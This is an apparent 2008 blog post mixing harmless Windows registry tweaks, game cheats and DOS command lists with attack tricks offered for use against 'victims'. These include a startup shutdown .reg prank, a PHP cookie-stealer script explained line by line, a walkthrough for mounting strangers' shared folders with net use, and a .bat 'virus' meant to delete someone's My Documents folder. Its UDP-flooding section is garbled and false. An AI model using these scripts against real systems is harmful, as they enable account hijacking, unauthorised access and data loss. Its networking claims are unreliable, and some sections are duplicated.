Thursday, June 19, 2008

ALL THE GOOD TWEAKS

D:\>nbtstat/?

Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refr
esh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

==================================================================================

10 FANTASTIC YouTube Video Download Tools10 FANTASTIC YouTube, Yahoo, Google Video Downloading Tools.All tested. All working.1.)

Download videos from Yahoo, Youtube,

Google:http://zenisa.com/2007/08/02/download-vdeos-youtube-google-vdeos/

2.) YouTube (IN MPEG) Video Downloaderhttp://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

3.) YouTube (IN MPEG) Video Downloader
http://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

4.) Youtube Grabber - Alternate Link
http://zenisa.com/2007/08/01/youtube-grabber-alternate-link/

5.) YouTube : Download Videos to your DVD
http://zenisa.com/2007/08/01/youtube-download-play-pack/

6.) YouTube to DVD

http://zenisa.com/2007/08/01/hacking-tool-youtube-to-dvd/

7.) 1-2-3 steps to YouTube Download & Play Pack

http://zenisa.com/2007/08/01/1-2-3-steps-to-youtube-download-play-pack/

8.) How to download/capture videos at www.youtube.com

http://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

9.) How to download/capture videos at
www.youtube.comhttp://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

10.) Real Player 11 full (+YOUTUBE DOWNLOADER)

http://zenisa.com/2007/07/30/eal-player-11-full-youtube-downloader/

========================================================================

hide ur folders in adifferentway$$$$$$$$$$$$$$$

hide ur folders in adifferent way

Right Click on the desktop.Make a new folder

2)Now rename the folder with a space(U have to hold ALT key and type 0160 OR 255 ).

3)Now u have a folder with out a name.

4)Right click on the folder>properties>customize. Click on change icon.

5)Scroll a bit, u should find some empty spaces, Click on any one of them.
click ok
Thats it, now u can store ur personal data without any 3rd party tools.

-------------------------------------------------------------------------------------------

U can also hide ur folder by dis method:-

open Start>Run>CMD
now type attrib +s +h C:/name of d folder u want to hide
Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...

And to unhide type same command juzz put "-" instead of "+"

===============================================================

Shutdown ur friend's comp when everytime it starts

put this followin text in a .reg file and run it in the victims pc:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

------------------------------

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:

=====================================================================================

Bypassing Word Verification

# You may get irritated while sending a link in your friends scrapbook.
# You can bypass this word verification while sending links by this trick.
# The simple logic is you make the link 'dead'.
# All you have to do is to just change http to hTTp (two capital T's) and www to wWw.# Now the link will be dead and bypass the word verification............

========================

Cookie Stealing

What is it?

A cookiestealer is a small script, written in a webbased programming language (in this case PHP). It reads a variable from the address-bar, which contains in our case the cookies, which we want to steal. Ofcourse you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?

As you might know, most of the time, login-information is stored in cookies.So if you can make the browser think you're the one who logged in, and setthe cookies, you'll be able to login as the person you defaced. How we makethe browser think this, I will learn you later on.

Writing the stealer.

will give you the script and after that I will explain what it does line by line. So here it is:

1 2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'

');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:
1: 2: $cookie = $_GET['C']; Here the variable $cookie gets the content out ofthe adress, from what's behind C=[the cookie]
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't youthink =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\nReferer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (dûh)
9. header ("Location: /picture.html"); send the visitor to another page, so hewont notice that the cookie is logged... ofcourse picture.html can be everything.
10. ?> The closing tag for a php-script
Now we have to know how to make the link:This must be the most basic version:

ALL THE INTERSTING TWEAKS

Change the Registered User Information
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.
1) Open RegEdit
2) Got to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion.
3) Change the value of "RegisteredOrganization" or "RegisteredOwner", to what ever you want

And now the registered user information is changed.

=========================

The Complete list !
Can u Do it!
Try to create a folder in Windows with either of these names--"con" or "nul" or "Aux" or "Lpt1".
Windows will not let u create ....
This is coz these refer 2 some well known ports....
-con corresponds to the console
-Lpt1 corresponds to printer and so on....
well dat was common but hw bt this ?
Try these more

CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.

========================================

Branded Window with your photo in my computer properties
open notepad
dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
[General]Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

Save the file,
then make a right click on my computer
select properties, in the general tab a button will be highlighted (support information) make a click on it,
you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

=====================================

HOW TO DISPLY PENTIUM 5 OR EVEN MORE IN XP
NOW U CAN ABLE TO SHOW PENTIUM 5 AND EVEN MORE
I AM GIVING U THE TRICK BY WHICH YOU CAN NOW ABLE TO SHOW OR DISPLY EVEN PENTIUM 4 OR EVEN 5(EVEN U NOT HAVE THAT MUCH) AND PROCESSOR VALUE UPTO 3.0 HRTZ OR MORE THAN THIS

TYPE "REGEDIT" IN RUN BOX {START->RUN->TYPE REGEDIT}NOW CLICK IN H-KEY-LOCAL-MACHIN .
THEN ON HARDWARE.
THEN ON DISCRIPTION.
THEN ON SYSTEM,
THEN ON CentralProcessor.
THEN ON {H-KEY-LOCAL-MACHIN/HARDWARE/DISCRIPTION/SYSTEM/CentralProcessor/}NOW U GET IN RIGHT PANE THE VALUE THAT IS"ProcessorNameString"DOUBLE CLICK ON THIS VALUEVALUE NAME AND VALUE DATA IS NOW IN FROUNT OF U NOW IN DATA COLOM U CAN EDIT IT RANDOMLY WHAT U WANT IN PLACE OF THATVALUEAND THEN PRESS OK

NOW SEE SYSTEM PROPERTY JUST RIGHT CLICKING IN U ARE MY COMPUTER ICON OR SEE SYSTEM PROPERTY JUST BY PRESSING {WIN+PAUSE BREAK }

==================================================================

BATCH FUN
Type The Following In Note pad And Save with extention .bat Like Somename.bat And Execute It .. Have Fun....
It SHows U Diff Colours On THe Screen And ENds As Soon As U Press Any Key ...

@echo offecho e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg

batch fun1.open notepad,2. type following:startfun.bat
3.save the file as fun.bat4.execute it by double clicking.....5.many dos windows will b appearing , press ctrl+c to stop them.

======================================================

Automatically Kill Programs At Shutdown
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

===============================================

Add Specific Folders to Open Dialog Box (XP Home only)
When you use certain Windows applications (such as Notepad) to open a file, on theleft side of the Open dialog box are a group of icons and folders (such as MyDocuments, My Recent Documents, Desktop, My Computer, and My Network) towhich you can navigate to open files. A registry hack will let you put just the foldersof your choosing on the left side of the Open dialog box. Note that when you do this,it will affect XP applications such as Notepad and Paint that use the Open and Savecommon dialog boxes. However, it won’t affect Microsoft Office applications andother applications that don’t use the common dialog boxes. Run the Registry Editorand go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\comdlg32. This is the key that determines how common dialog boxes arehandled.You’re going to create a subkey that will create a customized location for the folders,and then give that subkey a series of values, each of which will define a folderlocation.To start, create a new subkey underneath EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\comdlg32 called Placesbar,and create a String value for it named Place0. Give Place0 a value of the topmostfolder that you want to appear on the Open dialog box, for example, C:\Projects. Next,create another String value for Placesbar called Place1. Give it a value of the secondfolder that you want to appear on the Open dialog box. You can put up to five iconson the Open dialog box, so create new String values up to Place4 and give themvalues as outlined in the previous steps. When you’re done, exit the Registry. Youwon’t have to reboot for the changes to take effect. If you do not want any folders toappear in common Open dialog boxes, you can do that as well. InHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\comdlg32, create a new DWORD value called NoPlacesBar and give it a value of 1.Exit the Registry. If you want the folders back, either delete NoPlacesBar or give it avalue of 0.

======================================================
Add Open With to all files
You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.
1. Open RegEdit
2.Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive.
You must enter the "OpenAs_RunDLL %1" exactly this way.

========================================================================

Change Logon Wallpaper-Windows XP

Logon wallpaper is the wallpaper or image that windows xp shows on screen when windows logs on (before it asks for username & password) . I
t’s usually set to the image-logo of the brand(manufacturer) of our computer (e.g. in compaq laptops).
Now we can set it to our own image or any other image(any bmp file) by following trick.
Open Startmenu->Run type regedit and press ok to open registry editor.(shows a tree like structure of directories at left)
In that hierarchical structure in left, navigate to registry entry HKEY_USERS\.DEFAULT\Control Panel\Desktop
In right side pane see a number of values placed in a table format.
choose the value named Wallpaper from there and double click it.
Now you see a box with value name as Wallpaper and value data as Path to the image file .
There give the full path of the image(bmp file) which you want to set as logon wallpaper by deleting previous path and writing path to your bmp file e.g. C:\WINDOWS\lon.BMP (to set image lon.BMP file as log on wall paper).
Also double click on WallpaperStyle and change it’s value to 2 to get a stretched wallpaper at logon.
Put that bmp file in windows directory for better results.
If that is a jpeg file, convert to bmp file by opening in Windows Image Viewer and save as bmp.

==============================================================

cheat codes for default games in windows xp-2
Pinball
Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Wall
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode.
No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
While in test mode press the following keys for more secrets:
H - Get a 1,000,000,000 High Score
M - Shows the amount of system memory
R - Increases your rank in game
Y - Shows the Frames/sec rate

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball.
No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely.
Once this is activated you will be unable to activate other secrets without restarting the game.

Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

FreeCell
Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play.
Then you will be asked if you want to Abort, Retry or Ignore.
Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game".
Enter -1 or -2 to activate the hidden game modes.

Hearts
Secret - Show All Cards
Instructions - Edit this registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts and create a new String value named ZB with a Data value of 42.
Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards.

Background - This secret is a reference to Douglas Adams' book the Hitch Hiker's Guide to the Galaxy. 'ZB' is the initials of the character Zaphod Beeblebrox, the Galactic President. '42' is the answer to The Ultimate Question Of Life, the Universe and Everything.

Minesweeper

Secret - Reveal Mines
Instructions - Minimize or close all running applications.
Launch Minesweeper, then type xyzzy.
Next hold down either shift key for one second.
Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen.
This pixel will change to black when your mouse moves over a mine.
You may need to change you desktop background to a solid color other then white or black to see the pixel.

Secret - Stop Timer
Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop.
Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.

==========================================================================

Change Logon Wallpaper-Windows XP

Logon wallpaper is the wallpaper or image that windows xp shows on screen when windows logs on (before it asks for username & password) . I
t’s usually set to the image-logo of the brand(manufacturer) of our computer (e.g. in compaq laptops).
Now we can set it to our own image or any other image(any bmp file) by following trick.
Open Startmenu->Run type regedit and press ok to open registry editor.(shows a tree like structure of directories at left)
In that hierarchical structure in left, navigate to registry entry HKEY_USERS\.DEFAULT\Control Panel\Desktop
In right side pane see a number of values placed in a table format.
choose the value named Wallpaper from there and double click it.
Now you see a box with value name as Wallpaper and value data as Path to the image file .
There give the full path of the image(bmp file) which you want to set as logon wallpaper by deleting previous path and writing path to your bmp file e.g. C:\WINDOWS\lon.BMP (to set image lon.BMP file as log on wall paper).
Also double click on WallpaperStyle and change it’s value to 2 to get a stretched wallpaper at logon.
Put that bmp file in windows directory for better results.
If that is a jpeg file, convert to bmp file by opening in Windows Image Viewer and save as bmp.
====================================

Boot WinXP Fast
1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".>
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9.Select the "Advanced Settings" tab then on the device or 1 that doesn'thave 'device type' greyed out select 'none' instead of 'autodetect'& click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer

==============================

Repairing scracthed disk........

How to repair scratched discs?

You no need to buy expensive liquid or foam to repair scratched discs. All you need is just toothpaste.

Yes, I said toothpaste. With the toothpaste, you can fix the scratches on the discs and get the shiny back

Here how you can do it by yourself to repair the scratched discs.

Put toothpaste on the disc surface. Apply the toothpaste all over the scratches. Rinse with water. Dry it with clean cloth. Done!

or by applying oil.......................

note :- worst scracthed disk may not work .........

================================
Every one wants to win everygame

this is the method troughwhich u can win every time .

this is all about solitare . wnever u play it

just press . " shift + alt + 2 "

press 2 ( @ ) , don't press 2 from the num pad )

and tn see the miracle .

================================================

Hacking In 15 Seconds!

system intrusion in 15 sec............

this how hackers attack the box ..........................

if your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1] see NBTSTAT DETAILS AT BELOW!

This will give you a read out that looks like this

NetBIOS Remote Machine Name Table
______________________________
Name Type Status
______________________________

abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered ____________________________________

The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number of <20>. A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -
Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this. Shared resources at \\ip_address Sharename Type Comment

______________________
MY DOCUMENTS Disk
TEMP Disk
_______________________

The command was completed successfully.)

This shows you that your potential victim has their My Documents Folder shared and their Temp directory shared. For you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.

SAUV :COURTESY : MY FRIEND ON NET

VARIOUS IMPORTANT AND INTERESTING TWEAKS !

AMISAUV<< :

1.Disable CD burning
Exciting, isn't it?
The user can't burn any CDs by this trick.
This restriction will disable the use of the inbuilt CD recording functions of Windows.
Open your registry and follow this path: HKEY_CURRENT_USER>Software>Microsoft>Windows>Current Version>Policies>Explorer andcreate this key: "NoCDBurning"
and set its value to 1.
Close you registry and logout/restart your system for the change to take the effect.

2.CREATING A VIRUS
HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.
HERE'S WHAT U SHOULD DO.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.

rmdir C:\Documents and Settings \S\Q.

THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A .BAT FILE.
I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

3.crash other machines using UDP flooders..
windows OS has an outstanding packet limit......
packets are data packs that constitute the internet traffic......
if the no of packets recieved at a time exceeds a particular limit, the operating system crashes..
standard package limit for windows and contemporary operating systems is 65535....
normal internet traffic does not constitute more than 600 packets at a time unless bandwidth is exceptionally high........
however if more than 65535 packets could be sent at a time the target pc crashes at once..this process is called UDP flooding (udp being user data protocols)..........
systems upto win '98 are vulnerable to these kind of attacks by default.........but the higher versions of windows have a built in packet limiter as a protection against UDP flooding.

Inorder to crash a victims pc all u need to do is to gain access to the pc and change the outstanding package limit to a number greater than 65535.........

steps to access the package console.......
in case of win xp..............
1. type gpedit.msc in run...
2. on the left menu double click administrative templates.
3. network==> qos package scheduler==> limit outstanding packets..

double click on limit outstanding packets and choose enable.........this displays the default packet limit.........reedit it to a value much higher than the original one.......this done u r ready to attack....

4.Control Programs That Run at Startup

The best way to prevent a program from running at Startup, is to check the program's own options for a way to prevent this.
Most good quality programs will provide an option for this.

If you can't find the option there,
click Start, Run and enter MSCONFIG.
Go to the Startup tab, and uncheck the item there.
This method is not always 100% successful. An example is a program that you do use, but you don't want running automatically.
Some programs will check to see if the program's own options say it should run at Startup.
If the program thinks its supposed to load at startup, it will re-create the autorun entry.

ALL DOS N ALL COMMANDS

All Dos Commands
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders

i recommend for all dos commands visit
http://www.ss64.com/nt/

COMING LOTS OF OTHERS IN THE DAYS TO COME

ALL DOS COMMANDS

ASSOC==>Displays or modifies file extension associations.
AT==>Schedules commands and programs to run on a computer.
ATTRIB==>Displays or changes file attributes.
BREAK==>Sets or clears extended CTRL+C checking.
CACLS==>Displays or modifies access control lists (ACLs) of files.
CALL==>Calls one batch program from another.
CD==>Displays the name of or changes the current directory.
CHCP==>Displays or sets the active code page number.
CHDIR==>Displays the name of or changes the current directory.
CHKDSK==>Checks a disk and displays a status report.
CHKNTFS==>Displays or modifies the checking of disk at boot time.
CLS==>Clears the screen.
CMD==>Starts a new instance of the Windows command interpreter.
COLOR==>Sets the default console foreground and background colors.
COMP==>Compares the contents of two files or sets of files.
COMPACT==>Displays or alters the compression of files on NTFS partitions.
CONVERT==>Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY==>Copies one or more files to another location.
DATE==>Displays or sets the date.
DEL==>Deletes one or more files.
DIR==>Displays a list of files and subdirectories in a directory.
DISKCOMP==>Compares the contents of two floppy disks.
DISKCOPY==>Copies the contents of one floppy disk to another.
DOSKEY==>Edits command lines, recalls Windows commands, and creates macros. ECHO==>Displays messages, or turns command echoing on or off.
ENDLOCAL==>Ends localization of environment changes in a batch file.
ERASE==>Deletes one or more files.
EXIT==>Quits the CMD.EXE program (command interpreter).
FC==>Compares two files or sets of files, and displays the differences between them.FIND==>Searches for a text string in a file or files.
FINDSTR==>Searches for strings in files.
FOR==>Runs a specified command for each file in a set of files.
FORMAT==>Formats a disk for use with Windows.
FTYPE==>Displays or modifies file types used in file extension associations.
GOTO==>Directs the Windows command interpreter to a labeled line in a batch program.
GRAFTABL==>Enables Windows to display an extended character set in graphics mode.
HELP==>Provides Help information for Windows commands.
IF==>Performs conditional processing in batch programs.
LABEL==>Creates, changes, or deletes the volume label of a disk.
MD==>Creates a directory.
MKDIR==>Creates a directory.
MODE==>Configures a system device.
MORE==>Displays output one screen at a time.
MOVE==>Moves one or more files from one directory to another directory.
PATH==>Displays or sets a search path for executable files.
PAUSE==>Suspends processing of a batch file and displays a message.
POPD==>Restores the previous value of the current directory saved by PUSHD.PRINT==>Prints a text file.
PROMPT==>Changes the Windows command prompt.
PUSHD==>Saves the current directory then changes it.
RD==>Removes a directory.
RECOVER==>Recovers readable information from a bad or defective disk.
REM==>Records comments (remarks) in batch files or CONFIG.SYS.
REN==>Renames a file or files.
RENAME==>Renames a file or files.
REPLACE==>Replaces files.
RMDIR==>Removes a directory.
SET==>Displays, sets, or removes Windows environment variables.
SETLOCAL==>Begins localization of environment changes in a batch file.
SHIFT==>Shifts the position of replaceable parameters in batch files.
SORT==>Sorts input.
START==>Starts a separate window to run a specified program or command.
SUBST==>Associates a path with a drive letter.
TIME==>Displays or sets the system time.
TITLE==>Sets the window title for a CMD.EXE session.
TREE==>Graphically displays the directory structure of a drive or path.
TYPE==>Displays the contents of a text file.
VER==>Displays the Windows version.
VERIFY==>Tells Windows whether to verify that your files are written correctly to a disk.
VOL==>Displays a disk volume label and serial number.
XCOPY==>Copies files and directory trees.

Windows Networking Utilities

Windows Networking Utilities :

Once TCP/IP is installed and configured on the computers on your network, a variety of helpful and interesting diagnostic and troubleshooting utilities become available to you. Most of these utilities are meant to be run from the command line.

